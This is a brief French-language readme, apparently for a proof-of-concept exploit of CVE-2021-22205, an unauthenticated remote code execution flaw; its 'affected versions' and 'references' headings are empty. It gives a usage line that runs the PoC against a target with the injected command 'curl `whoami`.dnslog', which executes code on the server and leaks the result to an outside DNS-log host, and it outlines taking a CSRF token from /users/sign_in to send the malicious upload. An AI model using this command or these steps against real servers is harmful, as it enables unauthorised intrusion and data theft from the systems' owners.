
CVE-2021-22205 RCE non autorisé
Versions affectées :
Utilisation
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

Obtenir le jeton CSRF :

Obtenez le jeton CSRF via /users/sign_in, puis utilisez le PoC CVE-2021-22205 précédent pour construire un paquet de téléchargement et exécuter une requête de téléchargement non authentifiée, aboutissant à une exécution de code à distance (RCE).


Références :